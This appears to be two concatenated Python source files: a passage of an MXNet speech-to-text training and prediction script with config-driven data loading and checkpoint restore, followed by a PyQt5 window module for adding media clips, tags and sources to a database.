from stt_datagenerator import DataGenerator
from stt_metric import STTMetric
from stt_bi_graphemes_util import generate_bi_graphemes_dictionary
from stt_bucketing_module import STTBucketingModule
from stt_io_bucketingiter import BucketSTTIter
# NOTE(review): this insert runs *after* all imports above, so it cannot
# change where those modules were loaded from; it only affects later
# dynamic imports (e.g. the ``import_module`` calls below) — confirm intent.
sys.path.insert(0, "../../python")
# os.environ['MXNET_ENGINE_TYPE'] = "NaiveEngine"
os.environ['MXNET_ENGINE_TYPE'] = "ThreadedEnginePerDevice"
# Disable GPU peer-to-peer memory access in MXNet.
os.environ['MXNET_ENABLE_GPU_P2P'] = "0"
# Module-level logging helper shared by load_data() and the __main__ block.
logUtil = LogUtil.getInstance()
class WHCS:
    """Mutable holder for the input feature geometry read from the
    ``data`` section of the cfg file (see ``load_data``)."""
    width = 0    # feature width read from cfg 'data/width'
    height = 0   # feature height read from cfg 'data/height'
    channel = 0  # number of channels read from cfg 'data/channel'
    stride = 0   # stride read from cfg 'data/stride'
class ConfigLogger(object):
    """File-like adapter that dumps a ConfigParser-style object to a logger.

    Calling the instance with a config object passes ``self`` to
    ``config.write(...)``, which routes every emitted line through
    ``log.info``.
    """

    def __init__(self, log):
        self.__log = log

    def __call__(self, config):
        self.__log.info("Config:")
        config.write(self)

    def write(self, data):
        # Strip surrounding whitespace so the output stays tidy and the
        # blank separator lines emitted by the config writer collapse.
        self.__log.info(data.strip())
def load_labelutil(labelUtil, is_bi_graphemes, language="en"):
    """Load the unicode map for *language* into ``labelUtil``.

    Parameters
    ----------
    labelUtil : object exposing ``load_unicode_set(csv_path)``.
    is_bi_graphemes : bool — pick the bi-grapheme map instead of the
        plain one.
    language : str, optional — only ``"en"`` is supported.

    Raises
    ------
    Exception
        If the bi-grapheme csv cannot be loaded (chained to the original
        error) or if *language* is unsupported.
    """
    if language == "en":
        if is_bi_graphemes:
            try:
                labelUtil.load_unicode_set("resources/unicodemap_en_baidu_bi_graphemes.csv")
            except Exception as err:
                # Narrowed from a bare ``except:`` so KeyboardInterrupt /
                # SystemExit are not swallowed; chain the original error
                # instead of discarding it.
                raise Exception("There is no resources/unicodemap_en_baidu_bi_graphemes.csv." +
                                " Please set overwrite_bi_graphemes_dictionary True at train section") from err
        else:
            labelUtil.load_unicode_set("resources/unicodemap_en_baidu.csv")
    else:
        raise Exception("Error: Language Type: %s" % language)
def load_data(args):
    """Build the data iterators for the mode named in the cfg file.

    Returns ``(train_iter, validation_iter, args)`` for modes 'train' /
    'load', and ``(test_iter, args)`` for mode 'predict'.  Also mutates
    ``args.config`` in place (sets 'arch/n_classes', 'arch/max_t_count',
    'arch/max_label_length').
    """
    mode = args.config.get('common', 'mode')
    if mode not in ['train', 'predict', 'load']:
        raise Exception('mode must be the one of the followings - train,predict,load')
    batch_size = args.config.getint('common', 'batch_size')

    # Feature geometry from the cfg 'data' section.
    whcs = WHCS()
    whcs.width = args.config.getint('data', 'width')
    whcs.height = args.config.getint('data', 'height')
    whcs.channel = args.config.getint('data', 'channel')
    whcs.stride = args.config.getint('data', 'stride')
    save_dir = 'checkpoints'
    model_name = args.config.get('common', 'prefix')
    is_bi_graphemes = args.config.getboolean('common', 'is_bi_graphemes')
    overwrite_meta_files = args.config.getboolean('train', 'overwrite_meta_files')
    overwrite_bi_graphemes_dictionary = args.config.getboolean('train', 'overwrite_bi_graphemes_dictionary')
    max_duration = args.config.getfloat('data', 'max_duration')
    language = args.config.get('data', 'language')

    log = logUtil.getlogger()
    labelUtil = LabelUtil.getInstance()
    if mode == "train" or mode == "load":
        data_json = args.config.get('data', 'train_json')
        val_json = args.config.get('data', 'val_json')
        datagen = DataGenerator(save_dir=save_dir, model_name=model_name)
        datagen.load_train_data(data_json, max_duration=max_duration)
        datagen.load_validation_data(val_json, max_duration=max_duration)
        if is_bi_graphemes:
            # (Re)generate the bi-grapheme dictionary from the loaded texts
            # if it is missing or an overwrite was requested; this needs the
            # plain (non-bi-grapheme) map loaded first.
            if not os.path.isfile("resources/unicodemap_en_baidu_bi_graphemes.csv") or overwrite_bi_graphemes_dictionary:
                load_labelutil(labelUtil=labelUtil, is_bi_graphemes=False, language=language)
                generate_bi_graphemes_dictionary(datagen.train_texts+datagen.val_texts)
        load_labelutil(labelUtil=labelUtil, is_bi_graphemes=is_bi_graphemes, language=language)
        args.config.set('arch', 'n_classes', str(labelUtil.get_count()))

        if mode == "train":
            if overwrite_meta_files:
                log.info("Generate mean and std from samples")
                normalize_target_k = args.config.getint('train', 'normalize_target_k')
                datagen.sample_normalize(normalize_target_k, True)
            else:
                log.info("Read mean and std from meta files")
                datagen.get_meta_from_file(
                    np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
                    np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
        elif mode == "load":
            # get feat_mean and feat_std to normalize dataset
            datagen.get_meta_from_file(
                np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
                np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
    elif mode == 'predict':
        test_json = args.config.get('data', 'test_json')
        datagen = DataGenerator(save_dir=save_dir, model_name=model_name)
        # The test set is loaded through load_train_data, so it lands in
        # the generator's "train" partition (see partition="train" below).
        datagen.load_train_data(test_json, max_duration=max_duration)
        # NOTE(review): load_labelutil returns None, so this binding is
        # unused; the real effect is mutating labelUtil in place.
        labelutil = load_labelutil(labelUtil, is_bi_graphemes, language="en")
        args.config.set('arch', 'n_classes', str(labelUtil.get_count()))
        datagen.get_meta_from_file(
            np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
            np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))

    is_batchnorm = args.config.getboolean('arch', 'is_batchnorm')
    if batch_size == 1 and is_batchnorm and (mode == 'train' or mode == 'load'):
        # NOTE(review): ``raise Warning`` aborts like any exception rather
        # than emitting a warning; ``warnings.warn`` may have been the
        # intent — confirm before changing.
        raise Warning('batch size 1 is too small for is_batchnorm')

    # sort file paths by its duration in ascending order to implement sortaGrad
    if mode == "train" or mode == "load":
        max_t_count = datagen.get_max_seq_length(partition="train")
        max_label_length = \
            datagen.get_max_label_length(partition="train", is_bi_graphemes=is_bi_graphemes)
    elif mode == "predict":
        max_t_count = datagen.get_max_seq_length(partition="test")
        max_label_length = \
            datagen.get_max_label_length(partition="test", is_bi_graphemes=is_bi_graphemes)

    args.config.set('arch', 'max_t_count', str(max_t_count))
    args.config.set('arch', 'max_label_length', str(max_label_length))
    from importlib import import_module
    prepare_data_template = import_module(args.config.get('arch', 'arch_file'))
    init_states = prepare_data_template.prepare_data(args)
    # sortaGrad: only the first training pass uses duration-sorted data.
    sort_by_duration = (mode == "train")
    is_bucketing = args.config.getboolean('arch', 'is_bucketing')
    save_feature_as_csvfile = args.config.getboolean('train', 'save_feature_as_csvfile')
    if is_bucketing:
        buckets = json.loads(args.config.get('arch', 'buckets'))
        data_loaded = BucketSTTIter(partition="train",
                                    count=datagen.count,
                                    datagen=datagen,
                                    batch_size=batch_size,
                                    num_label=max_label_length,
                                    init_states=init_states,
                                    seq_length=max_t_count,
                                    width=whcs.width,
                                    height=whcs.height,
                                    sort_by_duration=sort_by_duration,
                                    is_bi_graphemes=is_bi_graphemes,
                                    buckets=buckets,
                                    save_feature_as_csvfile=save_feature_as_csvfile)
    else:
        data_loaded = STTIter(partition="train",
                              count=datagen.count,
                              datagen=datagen,
                              batch_size=batch_size,
                              num_label=max_label_length,
                              init_states=init_states,
                              seq_length=max_t_count,
                              width=whcs.width,
                              height=whcs.height,
                              sort_by_duration=sort_by_duration,
                              is_bi_graphemes=is_bi_graphemes,
                              save_feature_as_csvfile=save_feature_as_csvfile)

    if mode == 'train' or mode == 'load':
        # Validation iterator is never duration-sorted.
        if is_bucketing:
            validation_loaded = BucketSTTIter(partition="validation",
                                              count=datagen.val_count,
                                              datagen=datagen,
                                              batch_size=batch_size,
                                              num_label=max_label_length,
                                              init_states=init_states,
                                              seq_length=max_t_count,
                                              width=whcs.width,
                                              height=whcs.height,
                                              sort_by_duration=False,
                                              is_bi_graphemes=is_bi_graphemes,
                                              buckets=buckets,
                                              save_feature_as_csvfile=save_feature_as_csvfile)
        else:
            validation_loaded = STTIter(partition="validation",
                                        count=datagen.val_count,
                                        datagen=datagen,
                                        batch_size=batch_size,
                                        num_label=max_label_length,
                                        init_states=init_states,
                                        seq_length=max_t_count,
                                        width=whcs.width,
                                        height=whcs.height,
                                        sort_by_duration=False,
                                        is_bi_graphemes=is_bi_graphemes,
                                        save_feature_as_csvfile=save_feature_as_csvfile)
        return data_loaded, validation_loaded, args
    elif mode == 'predict':
        return data_loaded, args
def load_model(args, contexts, data_train):
    # load model from model_name prefix and epoch of model_num_epoch with gpu contexts of contexts
    """Build (mode 'train') or restore (mode 'load'/'predict') the network.

    Parameters
    ----------
    args : parsed config wrapper exposing ``args.config``.
    contexts : device contexts the module should run on.
    data_train : training iterator; only its ``provide_data`` /
        ``provide_label`` names are read here (non-bucketing restore path).

    Returns
    -------
    (model_loaded, model_num_epoch) — ``model_num_epoch`` is ``None`` for
    a freshly built training model, otherwise the epoch recovered from
    the checkpoint file name.
    """
    import re
    mode = args.config.get('common', 'mode')
    load_optimizer_states = args.config.getboolean('load', 'load_optimizer_states')
    is_start_from_batch = args.config.getboolean('load', 'is_start_from_batch')

    from importlib import import_module
    symbol_template = import_module(args.config.get('arch', 'arch_file'))
    is_bucketing = args.config.getboolean('arch', 'is_bucketing')

    if mode == 'train':
        if is_bucketing:
            bucketing_arch = symbol_template.BucketingArch(args)
            model_loaded = bucketing_arch.get_sym_gen()
        else:
            model_loaded = symbol_template.arch(args)
        model_num_epoch = None
    elif mode == 'load' or mode == 'predict':
        model_file = args.config.get('common', 'model_file')
        model_name = os.path.splitext(model_file)[0]
        # Checkpoint names end with a 4-digit epoch, e.g. "prefix-0042".
        model_num_epoch = int(model_name[-4:])
        if is_bucketing:
            bucketing_arch = symbol_template.BucketingArch(args)
            model_loaded = bucketing_arch.get_sym_gen()
        else:
            # Drop the "-NNNN" suffix (dash + 4 digits) to get the prefix.
            model_path = 'checkpoints/' + str(model_name[:-5])
            data_names = [x[0] for x in data_train.provide_data]
            label_names = [x[0] for x in data_train.provide_label]
            model_loaded = mx.module.Module.load(
                prefix=model_path, epoch=model_num_epoch, context=contexts,
                data_names=data_names, label_names=label_names,
                load_optimizer_states=load_optimizer_states)
        if is_start_from_batch:
            # Raw string fixes the invalid escape sequence '\d' that is a
            # SyntaxWarning on modern Python; ``import re`` hoisted to the
            # top of the function so it is not buried in this branch.
            model_num_epoch = int(re.findall(r'\d+', model_file)[0])
    return model_loaded, model_num_epoch
if __name__ == '__main__':
    if len(sys.argv) <= 1:
        raise Exception('cfg file path must be provided. ' +
                        'ex)python main.py --configfile examplecfg.cfg')
    args = parse_args(sys.argv[1])
    # set parameters from cfg file
    # give random seed
    random_seed = args.config.getint('common', 'random_seed')
    mx_random_seed = args.config.getint('common', 'mx_random_seed')
    # random seed for shuffling data list (-1 means: leave unseeded)
    if random_seed != -1:
        np.random.seed(random_seed)
    # set mx.random.seed to give seed for parameter initialization
    if mx_random_seed != -1:
        mx.random.seed(mx_random_seed)
    else:
        # NOTE(review): hash(datetime.now()) varies per run AND per process
        # (string/bytes hash randomization does not apply to datetime, but
        # the value is still wall-clock dependent) — runs are not reproducible.
        mx.random.seed(hash(datetime.now()))
    # set log file name
    log_filename = args.config.get('common', 'log_filename')
    log = logUtil.getlogger(filename=log_filename)
    # set parameters from data section(common)
    mode = args.config.get('common', 'mode')
    if mode not in ['train', 'predict', 'load']:
        raise Exception(
            'Define mode in the cfg file first. ' +
            'train or predict or load can be the candidate for the mode.')

    # get meta file where character to number conversions are defined
    contexts = parse_contexts(args)
    num_gpu = len(contexts)
    batch_size = args.config.getint('common', 'batch_size')
    # check the number of gpus is positive divisor of the batch size for data parallel
    if batch_size % num_gpu != 0:
        raise Exception('num_gpu should be positive divisor of batch_size')
    if mode == "train" or mode == "load":
        data_train, data_val, args = load_data(args)
    elif mode == "predict":
        data_train, args = load_data(args)
    is_batchnorm = args.config.getboolean('arch', 'is_batchnorm')
    is_bucketing = args.config.getboolean('arch', 'is_bucketing')

    # log current config
    config_logger = ConfigLogger(log)
    config_logger(args.config)

    # load model
    model_loaded, model_num_epoch = load_model(args, contexts, data_train)
    # if mode is 'train', it trains the model
    if mode == 'train':
        if is_bucketing:
            module = STTBucketingModule(
                sym_gen=model_loaded,
                default_bucket_key=data_train.default_bucket_key,
                context=contexts
            )
        else:
            data_names = [x[0] for x in data_train.provide_data]
            label_names = [x[0] for x in data_train.provide_label]
            module = mx.mod.Module(model_loaded, context=contexts,
                                   data_names=data_names, label_names=label_names)
        do_training(args=args, module=module, data_train=data_train, data_val=data_val)
    # if mode is 'load', it loads model from the checkpoint and continues the training.
    elif mode == 'load':
        do_training(args=args, module=model_loaded, data_train=data_train, data_val=data_val,
                    begin_epoch=model_num_epoch + 1)
    # if mode is 'predict', it predict label from the input by the input model
    elif mode == 'predict':
        # predict through data
        if is_bucketing:
            max_t_count = args.config.getint('arch', 'max_t_count')
            load_optimizer_states = args.config.getboolean('load', 'load_optimizer_states')
            model_file = args.config.get('common', 'model_file')
            model_name = os.path.splitext(model_file)[0]
            model_num_epoch = int(model_name[-4:])

            model_path = 'checkpoints/' + str(model_name[:-5])
            model = STTBucketingModule(
                sym_gen=model_loaded,
                default_bucket_key=data_train.default_bucket_key,
                context=contexts
            )

            # NOTE(review): binding with for_training=True in a predict
            # path looks suspicious — confirm it is required by the
            # bucketing module.
            model.bind(data_shapes=data_train.provide_data,
                       label_shapes=data_train.provide_label,
                       for_training=True)
            _, arg_params, aux_params = mx.model.load_checkpoint(model_path, model_num_epoch)
            model.set_params(arg_params, aux_params)
            model_loaded = model
        else:
            model_loaded.bind(for_training=False, data_shapes=data_train.provide_data,
                              label_shapes=data_train.provide_label)
        max_t_count = args.config.getint('arch', 'max_t_count')
        eval_metric = STTMetric(batch_size=batch_size, num_gpu=num_gpu)
        # Both branches below run the same manual forward/metric loop;
        # nbatch is unused but kept from the original enumerate idiom.
        if is_batchnorm:
            for nbatch, data_batch in enumerate(data_train):
                model_loaded.forward(data_batch, is_train=False)
                model_loaded.update_metric(eval_metric, data_batch.label)
        else:
            #model_loaded.score(eval_data=data_train, num_batch=None,
            #                   eval_metric=eval_metric, reset=True)
            for nbatch, data_batch in enumerate(data_train):
                model_loaded.forward(data_batch, is_train=False)
                model_loaded.update_metric(eval_metric, data_batch.label)
    else:
        raise Exception(
            'Define mode in the cfg file first. ' +
            'train or predict or load can be the candidate for the mode')
|
<gh_stars>0
from pathlib import Path
from PyQt5 import QtCore, QtGui, QtWidgets
from . import _DatabaseWindow
import filetype
from ..database import Type
from .. import logger
from .QCustomObject import QTagEdit
class _Add(_DatabaseWindow):
    """Base class for every add window"""

    def __init__(self, window):
        super().__init__(window)
        old_key_press_event = self.window.keyPressEvent

        def new_key_press_event(a0: QtGui.QKeyEvent):
            # Swallow Enter/Return unless the file-or-url edit has focus.
            if a0.key() in (QtCore.Qt.Key_Return, QtCore.Qt.Key_Enter) and not self.file_or_url_edit.hasFocus():
                return
            else:
                old_key_press_event(a0)

        # the normal key press event would open the file choose dialog /
        # press the file_chooser button every time Enter is hit while a
        # ``QLineEdit`` is focused
        self.window.keyPressEvent = new_key_press_event

    def after_setup_ui(self) -> None:
        """Wire the common signal connections shared by all add windows."""
        # file chooser
        self.file_or_url_edit.textChanged.connect(self.on_text_changed)
        self.file_chooser.clicked.connect(self.on_choose_file)

        # save / new buttons
        self.save_button.clicked.connect(self.on_save)
        self.new_button.clicked.connect(self.on_new)

    def on_text_changed(self, value: str) -> None:
        """This will get called if the file or url line edit text is changing"""
        pass

    def on_choose_file(self) -> None:
        """Opens a file choose dialog"""
        # all unique media file types
        all_preferred_types = [extension.extension for clip_type in [filetype.audio_matchers, filetype.image_matchers, filetype.video_matchers] for extension in clip_type]
        file = QtWidgets.QFileDialog.getOpenFileName(self.window, directory=str(Path().home()),
                                                     filter=f'Preferred media file(*.{" *.".join(all_preferred_types)});;All files(*)')[0]
        if file:
            # checks the file type and sets the index if the type box after the type
            match = filetype.guess(file)
            if match in filetype.audio_matchers:
                self.type_box.setCurrentIndex(0)
            elif match in filetype.image_matchers:
                self.type_box.setCurrentIndex(1)
            elif match in filetype.video_matchers:
                self.type_box.setCurrentIndex(2)
            else:
                self.type_box.setCurrentIndex(3)
            # changes the file or url text edit text
            self.file_or_url_edit.setText(file)

    def on_save(self) -> None:
        """This will get called if the 'Save' button is clicked"""
        pass

    def on_new(self) -> None:
        """This will get called if the 'New' button is clicked"""
        pass
class AddClip(_Add):
    """Add-window for a clip: file/url, name, description, type, tags, source."""

    def __init__(self, window):
        super().__init__(window)
        # all tags which are currently in the database
        self._all_tags = [tag.name for tag in self.database.Tag.get_all()]
        # id of the selected source; 0 means no source selected yet
        self._source_id = 0

    def setupUi(self, Form):
        # NOTE(review): this method looks auto-generated (Qt Designer /
        # pyuic5 style) — presumably it should be regenerated from the
        # .ui file rather than edited by hand; confirm.
        Form.setObjectName("Form")
        Form.resize(400, 469)
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(Form)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.add_clip = QtWidgets.QLabel(Form)
        self.add_clip.setAlignment(QtCore.Qt.AlignCenter)
        self.add_clip.setObjectName("add_clip")
        self.verticalLayout_2.addWidget(self.add_clip)
        self.name_description_frame = QtWidgets.QFrame(Form)
        self.name_description_frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.name_description_frame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.name_description_frame.setObjectName("name_description_frame")
        self.verticalLayout = QtWidgets.QVBoxLayout(self.name_description_frame)
        self.verticalLayout.setObjectName("verticalLayout")
        # file-or-url row: line edit + "Choose file" button
        self.file_or_url_hlayout = QtWidgets.QHBoxLayout()
        self.file_or_url_hlayout.setObjectName("file_or_url_hlayout")
        self.file_or_url_edit = QtWidgets.QLineEdit(self.name_description_frame)
        self.file_or_url_edit.setText("")
        self.file_or_url_edit.setClearButtonEnabled(False)
        self.file_or_url_edit.setObjectName("file_or_url_edit")
        self.file_or_url_hlayout.addWidget(self.file_or_url_edit)
        self.file_chooser = QtWidgets.QPushButton(self.name_description_frame)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.file_chooser.sizePolicy().hasHeightForWidth())
        self.file_chooser.setSizePolicy(sizePolicy)
        self.file_chooser.setSizeIncrement(QtCore.QSize(0, 0))
        self.file_chooser.setCheckable(False)
        self.file_chooser.setObjectName("file_chooser")
        self.file_or_url_hlayout.addWidget(self.file_chooser)
        self.verticalLayout.addLayout(self.file_or_url_hlayout)
        self.line = QtWidgets.QFrame(self.name_description_frame)
        self.line.setFrameShape(QtWidgets.QFrame.HLine)
        self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.line.setObjectName("line")
        self.verticalLayout.addWidget(self.line)
        # name row
        self.name_hlayout = QtWidgets.QHBoxLayout()
        self.name_hlayout.setObjectName("name_hlayout")
        self.name_label = QtWidgets.QLabel(self.name_description_frame)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.name_label.sizePolicy().hasHeightForWidth())
        self.name_label.setSizePolicy(sizePolicy)
        self.name_label.setMinimumSize(QtCore.QSize(70, 0))
        self.name_label.setBaseSize(QtCore.QSize(0, 0))
        self.name_label.setObjectName("name_label")
        self.name_hlayout.addWidget(self.name_label)
        self.name_edit = QtWidgets.QLineEdit(self.name_description_frame)
        self.name_edit.setStyleSheet("")
        self.name_edit.setReadOnly(True)
        self.name_edit.setClearButtonEnabled(False)
        self.name_edit.setObjectName("name_edit")
        self.name_hlayout.addWidget(self.name_edit)
        self.verticalLayout.addLayout(self.name_hlayout)
        # description row
        self.description_hlayout = QtWidgets.QHBoxLayout()
        self.description_hlayout.setObjectName("description_hlayout")
        self.description_label = QtWidgets.QLabel(self.name_description_frame)
        self.description_label.setMinimumSize(QtCore.QSize(70, 0))
        self.description_label.setBaseSize(QtCore.QSize(0, 0))
        self.description_label.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
        self.description_label.setObjectName("description_label")
        self.description_hlayout.addWidget(self.description_label)
        self.description_edit = QtWidgets.QTextEdit(self.name_description_frame)
        self.description_edit.setEnabled(True)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.description_edit.sizePolicy().hasHeightForWidth())
        self.description_edit.setSizePolicy(sizePolicy)
        self.description_edit.setReadOnly(True)
        self.description_edit.setObjectName("description_edit")
        self.description_hlayout.addWidget(self.description_edit)
        self.verticalLayout.addLayout(self.description_hlayout)
        # type row (combo box filled with item texts in retranslateUi)
        self.type_hlayout = QtWidgets.QHBoxLayout()
        self.type_hlayout.setObjectName("type_hlayout")
        self.type_label = QtWidgets.QLabel(self.name_description_frame)
        self.type_label.setMinimumSize(QtCore.QSize(70, 0))
        self.type_label.setBaseSize(QtCore.QSize(0, 0))
        self.type_label.setObjectName("type_label")
        self.type_hlayout.addWidget(self.type_label)
        self.type_box = QtWidgets.QComboBox(self.name_description_frame)
        self.type_box.setEnabled(False)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.type_box.sizePolicy().hasHeightForWidth())
        self.type_box.setSizePolicy(sizePolicy)
        self.type_box.setFocusPolicy(QtCore.Qt.WheelFocus)
        self.type_box.setObjectName("type_box")
        self.type_box.addItem("")
        self.type_box.addItem("")
        self.type_box.addItem("")
        self.type_box.addItem("")
        self.type_hlayout.addWidget(self.type_box)
        self.verticalLayout.addLayout(self.type_hlayout)
        self.line_3 = QtWidgets.QFrame(self.name_description_frame)
        self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
        self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.line_3.setObjectName("line_3")
        self.verticalLayout.addWidget(self.line_3)
        # tags row (the scroll area is replaced with a QTagEdit in after_setup_ui)
        self.tags_hlayout = QtWidgets.QHBoxLayout()
        self.tags_hlayout.setObjectName("tags_hlayout")
        self.tags_label = QtWidgets.QLabel(self.name_description_frame)
        self.tags_label.setMinimumSize(QtCore.QSize(70, 0))
        self.tags_label.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
        self.tags_label.setObjectName("tags_label")
        self.tags_hlayout.addWidget(self.tags_label)
        self.tags_edit = QtWidgets.QScrollArea(self.name_description_frame)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.tags_edit.sizePolicy().hasHeightForWidth())
        self.tags_edit.setSizePolicy(sizePolicy)
        self.tags_edit.setWidgetResizable(True)
        self.tags_edit.setObjectName("tags_edit")
        self.scrollAreaWidgetContents = QtWidgets.QWidget()
        self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 290, 83))
        self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
        self.tags_edit.setWidget(self.scrollAreaWidgetContents)
        self.tags_hlayout.addWidget(self.tags_edit)
        self.verticalLayout.addLayout(self.tags_hlayout)
        self.line_2 = QtWidgets.QFrame(self.name_description_frame)
        self.line_2.setFrameShape(QtWidgets.QFrame.HLine)
        self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.line_2.setObjectName("line_2")
        self.verticalLayout.addWidget(self.line_2)
        # source row: "Select source" button + label showing the selection
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.choose_source_button = QtWidgets.QPushButton(self.name_description_frame)
        self.choose_source_button.setEnabled(False)
        self.choose_source_button.setMaximumSize(QtCore.QSize(100, 16777215))
        self.choose_source_button.setObjectName("choose_source_button")
        self.horizontalLayout.addWidget(self.choose_source_button)
        self.choose_source_label = QtWidgets.QLabel(self.name_description_frame)
        self.choose_source_label.setEnabled(False)
        self.choose_source_label.setObjectName("choose_source_label")
        self.horizontalLayout.addWidget(self.choose_source_label)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.verticalLayout_2.addWidget(self.name_description_frame)
        # save / new buttons at the bottom
        self.save_new_hlayout = QtWidgets.QHBoxLayout()
        self.save_new_hlayout.setObjectName("save_new_hlayout")
        self.save_button = QtWidgets.QPushButton(Form)
        self.save_button.setEnabled(False)
        self.save_button.setFlat(False)
        self.save_button.setObjectName("save_button")
        self.save_new_hlayout.addWidget(self.save_button)
        self.new_button = QtWidgets.QPushButton(Form)
        self.new_button.setCheckable(False)
        self.new_button.setChecked(False)
        self.new_button.setAutoRepeat(False)
        self.new_button.setAutoExclusive(False)
        self.new_button.setObjectName("new_button")
        self.save_new_hlayout.addWidget(self.new_button)
        self.verticalLayout_2.addLayout(self.save_new_hlayout)

        self.retranslateUi(Form)
        # Default type is index 3 ("Other", see retranslateUi).
        self.type_box.setCurrentIndex(3)
        QtCore.QMetaObject.connectSlotsByName(Form)

    def retranslateUi(self, Form):
        """Set all user-visible strings (generated translation hook)."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        self.add_clip.setText(_translate("Form", "Add clip"))
        self.file_or_url_edit.setPlaceholderText(_translate("Form", "File or url..."))
        self.file_chooser.setText(_translate("Form", "Choose file"))
        self.name_label.setText(_translate("Form", "Name"))
        self.description_label.setText(_translate("Form", "Description"))
        self.type_label.setText(_translate("Form", "Type"))
        self.type_box.setItemText(0, _translate("Form", "Audio"))
        self.type_box.setItemText(1, _translate("Form", "Image"))
        self.type_box.setItemText(2, _translate("Form", "Video"))
        self.type_box.setItemText(3, _translate("Form", "Other"))
        self.tags_label.setText(_translate("Form", "Tags"))
        self.choose_source_button.setText(_translate("Form", "Select source"))
        self.choose_source_label.setText(_translate("Form", "No source selected"))
        self.save_button.setText(_translate("Form", "Save"))
        self.save_button.setShortcut(_translate("Form", "Ctrl+S"))
        self.new_button.setText(_translate("Form", "New"))

    def after_setup_ui(self) -> None:
        super().after_setup_ui()
        # replaces the `self.tags_edit` scroll area with an `QCustomObject.QTagEdit`
        self.tags_edit.deleteLater()
        self.tags_edit.hide()
        self.tags_edit = QTagEdit()
        # configures the tag edit
        self.tags_edit.setEnabled(False)
        self.tags_edit.enableTagSuggestions(True)
        self.tags_edit.setTagSuggestions([tag.name for tag in self.database.Tag.get_all()])
        self.tags_hlayout.addWidget(self.tags_edit)
        self.choose_source_button.clicked.connect(self.on_select_source)

    def on_text_changed(self, text: str) -> None:
        # Enable/disable the rest of the form depending on whether the
        # file-or-url edit contains non-whitespace text.
        if text.strip() == '':
            is_value = False
        else:
            is_value = True
        self.name_edit.setReadOnly(not is_value)
        self.description_edit.setReadOnly(not is_value)
        self.type_box.setEnabled(is_value)
        self.tags_edit.setEnabled(is_value)
        self.choose_source_button.setEnabled(is_value)
        self.choose_source_label.setEnabled(is_value)
        self.save_button.setEnabled(is_value)

    def on_select_source(self) -> None:
        """Opens a new `source.ShowSource` window to select the clips source"""
        # this is imported here, because it would cause a circular import if it's imported above
        from .source import ShowSource
        source = self.database.Source.get(ShowSource(QtWidgets.QDialog(self.window, QtCore.Qt.WindowSystemMenuHint)).select())
        self._source_id = source.id
        self.choose_source_label.setText(source.name)

    def on_save(self) -> None:
        # Warn (but allow) saving a clip without a source.
        if not self._source_id:
            reply = QtWidgets.QMessageBox.question(self.window,
                                                   'No source is given', 'No source for the clip is given. Are you sure to proceed?',
                                                   buttons=QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
            if reply == QtWidgets.QMessageBox.No:
                return
        type = Type.Clip.from_name(self.type_box.currentText().lower())
        if not type:
            return
        id = self.database.Clip.add_clip(self.file_or_url_edit.text(), self._source_id, type.value, self.name_edit.text(), self.description_edit.toPlainText()).id
        # Link each tag to the new clip, creating unknown tags on the fly.
        for tag in self.tags_edit.tags():
            if tag in self._all_tags:
                self.database.Item.add_item(id, self.database.Tag.get_by(name=tag).id)
            else:
                self.database.Item.add_item(id, self.database.Tag.add_tag(tag).id)
                logger.debug(f'Added new tag - Name: {tag}')
        logger.debug(f'Added new clip - file / url: "{self.file_or_url_edit.text()}", source id: "{self._source_id}", type: "{type.value}", '
                     f'name: "{self.name_edit.text()}", description: "{self.description_edit.toPlainText()}", tags: {", ".join(self.tags_edit.tags())}')
        self.on_new()

    def on_new(self) -> None:
        # Reset the whole form to its initial (disabled) state.
        self.file_or_url_edit.setText('')
        self.name_edit.setText('')
        self.on_text_changed('')
        self.type_box.setCurrentIndex(3)
        self.tags_edit.clear()
class AddSource(_Add):
    """Form window for adding a new media source (audio / movie / series / other)
    to the database.

    `setupUi` / `retranslateUi` follow the Qt Designer (pyuic) layout code style;
    avoid hand-editing the widget wiring beyond what is necessary.
    """

    def setupUi(self, Form):
